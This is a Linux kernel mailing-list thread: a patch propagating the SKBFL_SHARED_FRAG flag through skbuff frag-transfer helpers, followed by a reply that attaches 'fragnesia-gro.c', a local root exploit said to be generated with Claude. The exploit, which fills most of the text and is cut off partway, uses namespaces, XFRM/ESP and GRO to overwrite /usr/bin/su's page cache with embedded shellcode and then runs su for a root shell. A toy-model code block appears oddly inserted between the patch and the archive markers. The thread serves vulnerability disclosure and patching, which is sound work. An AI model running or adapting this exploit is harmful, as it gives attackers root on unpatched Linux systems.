* [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
@ 2026-05-13 21:07 Hyunwoo Kim
2026-05-14 6:18 ` Sultan Alsawaf
2026-05-14 8:04 ` Paolo Abeni
0 siblings, 2 replies; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-13 21:07 UTC (permalink / raw)
To: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu,
mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert,
dsahern
Cc: netdev, stable, imv4bel

Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
skb_shinfo()->flags when moving frags from source to destination.
__pskb_copy_fclone() defers the rest of the shinfo metadata to
skb_copy_header() after copying frag descriptors, but that helper
only carries over gso_{size,segs,type} and never touches
skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
descriptors directly and leave flags untouched. As a result, the
destination skb keeps a reference to the same externally-owned or
page-cache-backed pages while reporting skb_has_shared_frag() as
false.

The mismatch is harmful in any in-place writer that uses
skb_has_shared_frag() to decide whether shared pages must be detoured
through skb_cow_data(). ESP input is one such writer (esp4.c,
esp6.c), and a single nft 'dup to <local>' rule -- or any other
nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
skb in esp_input() with the marker stripped, letting an unprivileged
user write into the page cache of a root-owned read-only file via
authencesn-ESN stray writes.

Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
were actually moved from the source. skb_copy() and skb_copy_expand()
share skb_copy_header() too but linearize all paged data into freshly
allocated head storage and emerge with nr_frags == 0, so
skb_has_shared_frag() returns false on its own; they need no change.

Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
Reported-by: William Bowling <vakzz@zellic.io>
Reported-by: Hyunwoo Kim <imv4bel@gmail.com>
Cc: stable@vger.kernel.org
Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com>
---
Changes in v2:
- Also propagate SHARED_FRAG in skb_shift()
- v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/
---
net/core/skbuff.c | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/net/core/skbuff.c b/net/core/skbuff.c
index 7dad68e3b518..7cd388504297 100644
--- a/net/core/skbuff.c
+++ b/net/core/skbuff.c
@@ -2248,6 +2248,7 @@ struct sk_buff *__pskb_copy_fclone(struct sk_buff *skb, int headroom,
skb_frag_ref(skb, i);
}
skb_shinfo(n)->nr_frags = i;
+ skb_shinfo(n)->flags |= skb_shinfo(skb)->flags & SKBFL_SHARED_FRAG;
}
if (skb_has_frag_list(skb)) {
@@ -4349,6 +4350,8 @@ int skb_shift(struct sk_buff *tgt, struct sk_buff *skb, int shiftlen)
tgt->ip_summed = CHECKSUM_PARTIAL;
skb->ip_summed = CHECKSUM_PARTIAL;
+ skb_shinfo(tgt)->flags |= skb_shinfo(skb)->flags & SKBFL_SHARED_FRAG;
+
skb_len_add(skb, -shiftlen);
skb_len_add(tgt, shiftlen);
@@ -6200,6 +6203,8 @@ bool skb_try_coalesce(struct sk_buff *to, struct sk_buff *from,
from_shinfo->frags,
from_shinfo->nr_frags * sizeof(skb_frag_t));
to_shinfo->nr_frags += from_shinfo->nr_frags;
+ if (from_shinfo->nr_frags)
+ to_shinfo->flags |= from_shinfo->flags & SKBFL_SHARED_FRAG;
if (!skb_cloned(from))
from_shinfo->nr_frags = 0;
--
2.43.0
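
The propagation rule that the three hunks above apply can be modeled in
userspace. What follows is a minimal sketch, not kernel code: struct
toy_shinfo, TOY_SHARED_FRAG, toy_move_frags(), toy_can_write_in_place()
and toy_selfcheck() are hypothetical names invented for illustration, the
flag value is arbitrary, and nr_frags stands in for the kernel's
"skb is nonlinear" test. It only shows why OR-ing the masked source flag
into the destination keeps an in-place writer's check honest.

```c
#include <assert.h>
#include <stdbool.h>

/* Hypothetical stand-in for SKBFL_SHARED_FRAG; the bit value is arbitrary. */
#define TOY_SHARED_FRAG (1u << 1)

/* Hypothetical, heavily reduced model of struct skb_shared_info. */
struct toy_shinfo {
	unsigned int flags;
	unsigned int nr_frags;
};

/*
 * Model of a frag-transfer helper: move every frag from src to dst.
 * The marker is carried over only when frags were actually moved, and
 * only the shared-frag bit is copied; other src flags stay behind.
 */
static void toy_move_frags(struct toy_shinfo *dst, struct toy_shinfo *src)
{
	if (!src->nr_frags)
		return;

	dst->nr_frags += src->nr_frags;
	dst->flags |= src->flags & TOY_SHARED_FRAG;
	src->nr_frags = 0;
}

/*
 * Model of the decision an in-place writer makes: writing is only safe
 * when the buffer is not cloned and holds no shared paged data.
 */
static bool toy_can_write_in_place(const struct toy_shinfo *si, bool cloned)
{
	return !cloned && !(si->nr_frags && (si->flags & TOY_SHARED_FRAG));
}

/* Walk through the scenario described in the commit message. */
static void toy_selfcheck(void)
{
	struct toy_shinfo from = { .flags = TOY_SHARED_FRAG, .nr_frags = 2 };
	struct toy_shinfo to = { .flags = 0, .nr_frags = 1 };

	/* Before the transfer, the destination owns all of its pages. */
	assert(toy_can_write_in_place(&to, false));

	toy_move_frags(&to, &from);

	/* After the transfer, the destination must report shared frags. */
	assert(to.nr_frags == 3);
	assert(!toy_can_write_in_place(&to, false));
}
```

Dropping the "dst->flags |= ..." line from toy_move_frags() makes the last
assertion in toy_selfcheck() fail, which is the toy equivalent of the
destination skb reporting skb_has_shared_frag() as false while still
referencing shared pages.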
^ permalink raw reply related [flat|nested] 6+ messages in thread* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers 2026-05-13 21:07 [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers Hyunwoo Kim @ 2026-05-14 6:18 ` Sultan Alsawaf 2026-05-14 9:23 ` Hyunwoo Kim 2026-05-14 8:04 ` Paolo Abeni 1 sibling, 1 reply; 6+ messages in thread From: Sultan Alsawaf @ 2026-05-14 6:18 UTC (permalink / raw) To: Hyunwoo Kim Cc: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu, mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert, dsahern, netdev, stable [-- Attachment #1: Type: text/plain, Size: 852 bytes --] On Thu, May 14, 2026 at 06:07:44AM +0900, Hyunwoo Kim wrote: > Changes in v2: > - Also propagate SHARED_FRAG in skb_shift() > - v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/ Hi Hyunwoo, I've been working on mitigating this vulnerability as a member of the kernel team at CIQ, a distro vendor. In particular, we wanted to make sure that there weren't any lingering places missing SHARED_FRAG propagation. To that end, I used Claude to discover that skb_gro_receive() remained unpatched (as you pointed out in the v1 thread). And then I generated a PoC exploiting the vulnerable skb_gro_receive() path. The PoC is a modified version of the original fragnesia PoC. It works 100% of the time, just like the original fragnesia PoC. I have attached the PoC and a patch that fixes skb_gro_receive(). Please take a look at them. Thanks, Sultan [-- Attachment #2: fragnesia-gro.c --] [-- Type: text/plain, Size: 25061 bytes --] /* * fragnesia-gro.c: skb_gro_receive() SKBFL_SHARED_FRAG page-cache corruption PoC * * Drop-in replacement for the espintcp fragnesia variant, targeting the same * bug class (CVE-2026-46300) through the GRO frag-merge path instead of the * espintcp path. Copies shell_elf over /usr/bin/su's page cache the same way * the original fragnesia does. 
* * The exploit splices 17 bytes per round (1 byte ciphertext + 16 byte ICV) so * each ESP decrypt corrupts exactly ONE target byte with no collateral damage. * A precomputed IV table selects the AES-GCM keystream byte that XORs the * current file content to the desired shell_elf byte. * * Based on the Fragnesia PoC by William Bowling / Hyunwoo Kim. * * Build: * gcc -O2 -Wall -Wextra -static fragnesia-gro.c -o fragnesia-gro * * Run (as root): * ./fragnesia-gro * * Exit codes: * 1: vulnerable (page cache mutated through GRO flag-strip path) * 0: fixed (byte unchanged) * 2: local setup or argument error * 4: namespace/veth gate closed */ #define _GNU_SOURCE #include <arpa/inet.h> #include <errno.h> #include <fcntl.h> #include <limits.h> #include <net/if.h> #include <netinet/in.h> #include <sched.h> #include <signal.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mount.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/types.h> #include <time.h> #include <sys/wait.h> #include <unistd.h> #include <linux/bpf.h> #include <linux/if_addr.h> #include <linux/if_alg.h> #include <linux/netlink.h> #include <linux/xfrm.h> /* ---- compat defines ---- */ #ifndef NLA_ALIGNTO #define NLA_ALIGNTO 4 #endif #define NLA_ALIGN(len) (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1)) #ifndef NLA_HDRLEN #define NLA_HDRLEN ((int)NLA_ALIGN(sizeof(struct nlattr))) #endif #ifndef RTM_NEWLINK #define RTM_NEWLINK 16 #endif #ifndef RTM_NEWADDR #define RTM_NEWADDR 20 #endif #ifndef NETLINK_ROUTE #define NETLINK_ROUTE 0 #endif #ifndef NETLINK_XFRM #define NETLINK_XFRM 6 #endif #ifndef IFLA_IFNAME #define IFLA_IFNAME 3 #endif #ifndef IFLA_LINKINFO #define IFLA_LINKINFO 18 #endif #ifndef IFLA_INFO_KIND #define IFLA_INFO_KIND 1 #endif #ifndef IFLA_INFO_DATA #define IFLA_INFO_DATA 2 #endif #ifndef VETH_INFO_PEER #define VETH_INFO_PEER 1 #endif #ifndef IFLA_NET_NS_PID #define 
IFLA_NET_NS_PID 19 #endif #ifndef IFA_LOCAL #define IFA_LOCAL 2 #endif #ifndef IFA_ADDRESS #define IFA_ADDRESS 1 #endif #ifndef NLA_F_NESTED #define NLA_F_NESTED (1 << 15) #endif #ifndef ETHTOOL_SGRO #define ETHTOOL_SGRO 0x0000002c #endif #ifndef ETHTOOL_STSO #define ETHTOOL_STSO 0x0000001f #endif #ifndef ETHTOOL_SGSO #define ETHTOOL_SGSO 0x00000024 #endif #ifndef SIOCETHTOOL #define SIOCETHTOOL 0x8946 #endif #ifndef UDP_ENCAP #define UDP_ENCAP 100 #endif #ifndef UDP_ENCAP_ESPINUDP #define UDP_ENCAP_ESPINUDP 2 #endif #ifndef UDP_GRO #define UDP_GRO 104 #endif #ifndef UDP_CORK #define UDP_CORK 1 #endif #ifndef AF_ALG #define AF_ALG 38 #endif #ifndef SOL_ALG #define SOL_ALG 279 #endif #ifndef ALG_SET_KEY #define ALG_SET_KEY 1 #endif #ifndef ALG_SET_OP #define ALG_SET_OP 3 #endif #ifndef ALG_OP_ENCRYPT #define ALG_OP_ENCRYPT 1 #endif #ifndef IFLA_XDP #define IFLA_XDP 43 #endif #ifndef IFLA_XDP_FD #define IFLA_XDP_FD 1 #endif #ifndef IFLA_XDP_FLAGS #define IFLA_XDP_FLAGS 3 #endif #ifndef XDP_FLAGS_SKB_MODE #define XDP_FLAGS_SKB_MODE (1U << 1) #endif struct rtnl_ifinfomsg { unsigned char ifi_family; unsigned char __ifi_pad; unsigned short ifi_type; int ifi_index; unsigned int ifi_flags; unsigned int ifi_change; }; /* ---- constants ---- */ #define VETH0 "veth0" #define VETH1 "veth1" #define ADDR_SRC "10.0.0.1" #define ADDR_DST "10.0.0.2" #define UDP_PORT 4500 #define ESP_SPI 0x100 #define ICV_LEN 16 #define PAYLOAD_LEN 192 /* * Splice exactly 17 bytes per round: rfc4106 shifts the 8-byte IV into * the AAD, so the inner GCM sees SPLICE_LEN bytes of ciphertext. With * SPLICE_LEN - ICV_LEN = 1, exactly one frag byte is decrypted. 
*/ #define SPLICE_LEN (1 + ICV_LEN) static const unsigned char xfrm_key[20] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x01, 0x02, 0x03, 0x04 }; static const uint8_t shell_elf[PAYLOAD_LEN] = { 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a, 0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12, 0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6, 0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00, 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, }; static const char *target_file = "/usr/bin/su"; /* ---- utility ---- */ static void die(const char *w) { fprintf(stderr, "%s: %s\n", w, strerror(errno)); exit(2); } static void gate_fail(const char *w) { fprintf(stderr, "gate_closed: %s: %s\n", w, strerror(errno)); exit(4); } static void store_be32(unsigned char *p, uint32_t v) { p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v; } static void sync_write(int fd) { unsigned char b = 1; if (write(fd, &b, 1) != 1) die("sync_write"); } static void sync_read(int fd) { unsigned char b; if (read(fd, &b, 1) != 1) die("sync_read"); } static unsigned char read_byte_at(int fd, off_t off) { unsigned char b; if (pread(fd, &b, 1, off) != 1) die("pread"); return b; } /* ---- netlink helpers ---- */ static int 
nl_ack_errno(char *buf, ssize_t len) { struct nlmsghdr *nlh; for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, (unsigned int)len); nlh = NLMSG_NEXT(nlh, len)) { if (nlh->nlmsg_type == NLMSG_ERROR) { struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nlh); if (e->error == 0) return 0; errno = -e->error; return -1; } } errno = EPROTO; return -1; } static void add_nlattr(struct nlmsghdr *nlh, size_t max, unsigned short type, const void *data, size_t len) { size_t off = NLMSG_ALIGN(nlh->nlmsg_len); struct nlattr *nla = (struct nlattr *)((char *)nlh + off); if (off + NLA_HDRLEN + len > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); } nla->nla_type = type; nla->nla_len = NLA_HDRLEN + len; memcpy((char *)nla + NLA_HDRLEN, data, len); nlh->nlmsg_len = off + NLA_ALIGN(nla->nla_len); } static struct nlattr *nest_begin(struct nlmsghdr *nlh, size_t max, unsigned short type) { size_t off = NLMSG_ALIGN(nlh->nlmsg_len); struct nlattr *nla = (struct nlattr *)((char *)nlh + off); if (off + NLA_HDRLEN > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); } nla->nla_type = type; nla->nla_len = NLA_HDRLEN; nlh->nlmsg_len = off + NLA_HDRLEN; return nla; } static void nest_end(struct nlmsghdr *nlh, struct nlattr *nla) { nla->nla_len = (unsigned short)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len) - (char *)nla); } static void nl_talk(struct nlmsghdr *nlh, int proto, const char *label) { struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; char resp[4096]; int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, proto); if (fd < 0) gate_fail(label); if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label); memset(&sa, 0, sizeof(sa)); sa.nl_family = AF_NETLINK; if (sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label); ssize_t r = recv(fd, resp, sizeof(resp), 0); if (r < 0 || nl_ack_errno(resp, r) < 0) gate_fail(label); close(fd); } /* ---- network setup ---- */ static void if_up(const char *name) { struct ifreq ifr = {}; int fd = 
socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (fd < 0) gate_fail("socket"); strncpy(ifr.ifr_name, name, IFNAMSIZ - 1); if (ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) gate_fail(name); ifr.ifr_flags |= IFF_UP; if (ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) gate_fail(name); close(fd); } static void create_veth(void) { char buf[4096] = {}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH0, strlen(VETH0) + 1); struct nlattr *li = nest_begin(nlh, sizeof(buf), IFLA_LINKINFO | NLA_F_NESTED); add_nlattr(nlh, sizeof(buf), IFLA_INFO_KIND, "veth", 5); struct nlattr *id = nest_begin(nlh, sizeof(buf), IFLA_INFO_DATA | NLA_F_NESTED); struct nlattr *pn = nest_begin(nlh, sizeof(buf), VETH_INFO_PEER | NLA_F_NESTED); { size_t o = NLMSG_ALIGN(nlh->nlmsg_len); memset((char *)nlh + o, 0, sizeof(struct rtnl_ifinfomsg)); nlh->nlmsg_len = o + sizeof(struct rtnl_ifinfomsg); } add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH1, strlen(VETH1) + 1); nest_end(nlh, pn); nest_end(nlh, id); nest_end(nlh, li); nl_talk(nlh, NETLINK_ROUTE, "create veth"); } static void move_to_netns(const char *name, pid_t pid) { char buf[4096] = {}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; uint32_t ns_pid = (uint32_t)pid; unsigned int idx = if_nametoindex(name); if (!idx) gate_fail("if_nametoindex"); nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx; add_nlattr(nlh, sizeof(buf), IFLA_NET_NS_PID, &ns_pid, sizeof(ns_pid)); nl_talk(nlh, NETLINK_ROUTE, "move veth"); } static void add_addr(const char *name, const char *addr) { char 
buf[4096] = {}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; struct in_addr a; unsigned int idx = if_nametoindex(name); if (!idx) gate_fail("if_nametoindex"); inet_pton(AF_INET, addr, &a); nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg)); nlh->nlmsg_type = RTM_NEWADDR; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; struct ifaddrmsg *ifa = (struct ifaddrmsg *)NLMSG_DATA(nlh); ifa->ifa_family = AF_INET; ifa->ifa_prefixlen = 24; ifa->ifa_index = idx; add_nlattr(nlh, sizeof(buf), IFA_LOCAL, &a, sizeof(a)); add_nlattr(nlh, sizeof(buf), IFA_ADDRESS, &a, sizeof(a)); nl_talk(nlh, NETLINK_ROUTE, "add addr"); } static void ethtool_set(const char *name, uint32_t cmd, uint32_t data) { struct ifreq ifr = {}; struct { uint32_t cmd; uint32_t data; } val = { cmd, data }; int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (fd < 0) return; strncpy(ifr.ifr_name, name, IFNAMSIZ - 1); ifr.ifr_data = (void *)&val; ioctl(fd, SIOCETHTOOL, &ifr); close(fd); } /* ---- XDP attach/detach for NAPI init ---- */ static void xdp_toggle(const char *name, int prog_fd, uint32_t flags) { char buf[4096] = {}; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; unsigned int idx = if_nametoindex(name); if (!idx) return; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx; struct nlattr *x = nest_begin(nlh, sizeof(buf), IFLA_XDP | NLA_F_NESTED); add_nlattr(nlh, sizeof(buf), IFLA_XDP_FD, &prog_fd, sizeof(prog_fd)); add_nlattr(nlh, sizeof(buf), IFLA_XDP_FLAGS, &flags, sizeof(flags)); nest_end(nlh, x); nl_talk(nlh, NETLINK_ROUTE, "xdp"); } static void enable_veth_napi(const char *name) { struct bpf_insn { uint8_t code; uint8_t regs; int16_t off; int32_t imm; }; struct bpf_insn prog[] = { { 0xb7, 0, 0, 2 }, { 0x95, 0, 0, 0 } }; struct { uint32_t t; 
uint32_t c; uint64_t i; uint64_t l; uint32_t a,b; uint64_t d; uint32_t e,f; char n[16]; } attr = {}; static const char lic[] = "GPL"; attr.t = 6; attr.c = 2; attr.i = (uint64_t)(unsigned long)prog; attr.l = (uint64_t)(unsigned long)lic; int fd = (int)syscall(__NR_bpf, 5, &attr, sizeof(attr)); if (fd < 0) return; xdp_toggle(name, fd, XDP_FLAGS_SKB_MODE); close(fd); int m1 = -1; xdp_toggle(name, m1, XDP_FLAGS_SKB_MODE); } /* ---- user namespace ---- */ static void setup_userns(void) { uid_t uid = getuid(); gid_t gid = getgid(); int rp[2], mp[2]; if (pipe(rp) < 0 || pipe(mp) < 0) die("pipe"); pid_t c = fork(); if (c < 0) die("fork"); if (c == 0) { char path[64], map[64]; pid_t pp = getppid(); close(rp[1]); close(mp[0]); sync_read(rp[0]); snprintf(path, sizeof(path), "/proc/%d/setgroups", pp); int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "deny", 4); close(fd); } snprintf(path, sizeof(path), "/proc/%d/uid_map", pp); snprintf(map, sizeof(map), "0 %u 1\n", uid); fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); } snprintf(path, sizeof(path), "/proc/%d/gid_map", pp); snprintf(map, sizeof(map), "0 %u 1\n", gid); fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); } sync_write(mp[1]); _exit(0); } close(rp[0]); close(mp[1]); if (unshare(CLONE_NEWUSER) < 0) gate_fail("unshare(CLONE_NEWUSER)"); sync_write(rp[1]); sync_read(mp[0]); waitpid(c, NULL, 0); setresgid(0, 0, 0); setresuid(0, 0, 0); } /* ---- XFRM SA ---- */ static void add_sa(void) { char buf[4096] = {}; char ab[sizeof(struct xfrm_algo_aead) + sizeof(xfrm_key)]; struct nlmsghdr *nlh = (struct nlmsghdr *)buf; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info)); nlh->nlmsg_type = XFRM_MSG_NEWSA; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh); xs->sel.family = AF_INET; inet_pton(AF_INET, ADDR_SRC, &xs->saddr.a4); inet_pton(AF_INET, ADDR_DST, &xs->id.daddr.a4); 
xs->id.spi = htonl(ESP_SPI); xs->id.proto = IPPROTO_ESP; xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0; xs->lft.soft_byte_limit = xs->lft.hard_byte_limit = XFRM_INF; xs->lft.soft_packet_limit = xs->lft.hard_packet_limit = XFRM_INF; memset(ab, 0, sizeof(ab)); struct xfrm_algo_aead *a = (struct xfrm_algo_aead *)ab; strcpy(a->alg_name, "rfc4106(gcm(aes))"); a->alg_key_len = sizeof(xfrm_key) * 8; a->alg_icv_len = ICV_LEN * 8; memcpy(a->alg_key, xfrm_key, sizeof(xfrm_key)); add_nlattr(nlh, sizeof(buf), XFRMA_ALG_AEAD, ab, sizeof(ab)); struct xfrm_encap_tmpl encap = {}; encap.encap_type = UDP_ENCAP_ESPINUDP; encap.encap_sport = htons(UDP_PORT); encap.encap_dport = htons(UDP_PORT); add_nlattr(nlh, sizeof(buf), XFRMA_ENCAP, &encap, sizeof(encap)); nl_talk(nlh, NETLINK_XFRM, "add SA"); } /* ---- AES-GCM keystream ---- */ static void aes_ecb_block(int alg_fd, const unsigned char in[16], unsigned char out[16]) { char cb[CMSG_SPACE(sizeof(uint32_t))] = {}; struct iovec iov = { (void *)in, 16 }; struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1, .msg_control = cb, .msg_controllen = sizeof(cb) }; uint32_t op = ALG_OP_ENCRYPT; struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP; cm->cmsg_len = CMSG_LEN(sizeof(op)); memcpy(CMSG_DATA(cm), &op, sizeof(op)); int ofd = accept4(alg_fd, NULL, NULL, SOCK_CLOEXEC); if (ofd < 0) die("AF_ALG accept"); if (sendmsg(ofd, &msg, 0) != 16) die("AF_ALG send"); if (read(ofd, out, 16) != 16) die("AF_ALG read"); close(ofd); } /* * rfc4106 shifts the 8-byte ESP IV into the AAD, so the inner GCM * ciphertext starts at frag byte 0. The target byte is at CTR position 0. 
*/ #define KS_POS 0 static uint16_t stream_nonce[256]; static bool stream_have[256]; static void build_stream_table(void) { struct sockaddr_alg sa = { .salg_family = AF_ALG }; strcpy((char *)sa.salg_type, "skcipher"); strcpy((char *)sa.salg_name, "ecb(aes)"); int fd = socket(AF_ALG, SOCK_SEQPACKET | SOCK_CLOEXEC, 0); if (fd < 0) die("AF_ALG"); if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("AF_ALG bind"); if (setsockopt(fd, SOL_ALG, ALG_SET_KEY, xfrm_key, 16) < 0) die("AF_ALG key"); unsigned int count = 0; for (unsigned nonce = 0; nonce <= 0xffff && count < 256; nonce++) { unsigned char iv[8], cb[16], out[16]; memset(iv, 0xcc, sizeof(iv)); store_be32(iv + 4, nonce); memcpy(cb, &xfrm_key[16], 4); memcpy(cb + 4, iv, 8); store_be32(cb + 12, 2 + KS_POS / 16); aes_ecb_block(fd, cb, out); unsigned char b = out[KS_POS % 16]; if (stream_have[b]) continue; stream_have[b] = true; stream_nonce[b] = (uint16_t)nonce; count++; } close(fd); if (count < 256) { fprintf(stderr, "incomplete stream table: %u/256\n", count); exit(2); } } /* ---- main ---- */ int main(void) { setvbuf(stdout, NULL, _IONBF, 0); printf("[*] uid=%d euid=%d gid=%d egid=%d\n", getuid(), geteuid(), getgid(), getegid()); printf("[*] mode=gro_espinudp_pagecache_replace\n\n"); struct stat st; if (stat(target_file, &st) < 0 || !S_ISREG(st.st_mode) || st.st_size < PAYLOAD_LEN + SPLICE_LEN) die("stat target"); printf("[*] target=%s size=%lld\n", target_file, (long long)st.st_size); build_stream_table(); printf("[*] stream_table=256 entries at ciphertext position %d\n", KS_POS); /* * Fork before entering the user namespace. The child enters the * user/net namespace and does all the page-cache corruption. The * parent stays in the init user namespace so that execve() of the * corrupted setuid su binary honors the setuid bit, giving a real * root shell rather than a fake namespace-root shell. 
*/ fflush(stdout); fflush(stderr); pid_t worker = fork(); if (worker < 0) die("fork worker"); if (worker > 0) { int wstatus; waitpid(worker, &wstatus, 0); if (WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 1) { char *argv[] = { (char *)target_file, NULL }; char *envp[] = { NULL }; execve(target_file, argv, envp); } return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : 2; } /* Child: enter user namespace and do the corruption */ if (getuid() != 0) setup_userns(); if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)"); if_up("lo"); create_veth(); int p_ns[2], p_veth[2], p_rdy[2]; if (pipe(p_ns) < 0 || pipe(p_veth) < 0 || pipe(p_rdy) < 0) die("pipe"); fflush(stdout); fflush(stderr); pid_t rx = fork(); if (rx < 0) die("fork"); if (rx == 0) { close(p_ns[0]); close(p_veth[1]); close(p_rdy[0]); if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)"); if (unshare(CLONE_NEWNS) < 0) gate_fail("unshare(CLONE_NEWNS)"); mount("", "/", NULL, MS_PRIVATE | MS_REC, NULL); mount("sysfs", "/sys", "sysfs", 0, NULL); sync_write(p_ns[1]); close(p_ns[1]); sync_read(p_veth[0]); close(p_veth[0]); if_up("lo"); ethtool_set(VETH1, ETHTOOL_SGRO, 1); if_up(VETH1); enable_veth_napi(VETH1); add_addr(VETH1, ADDR_DST); add_sa(); int ufd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (ufd < 0) gate_fail("socket"); struct sockaddr_in ba = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; inet_pton(AF_INET, ADDR_DST, &ba.sin_addr); if (bind(ufd, (struct sockaddr *)&ba, sizeof(ba)) < 0) gate_fail("bind"); int et = UDP_ENCAP_ESPINUDP, gro = 1; setsockopt(ufd, IPPROTO_UDP, UDP_ENCAP, &et, sizeof(et)); setsockopt(ufd, IPPROTO_UDP, UDP_GRO, &gro, sizeof(gro)); 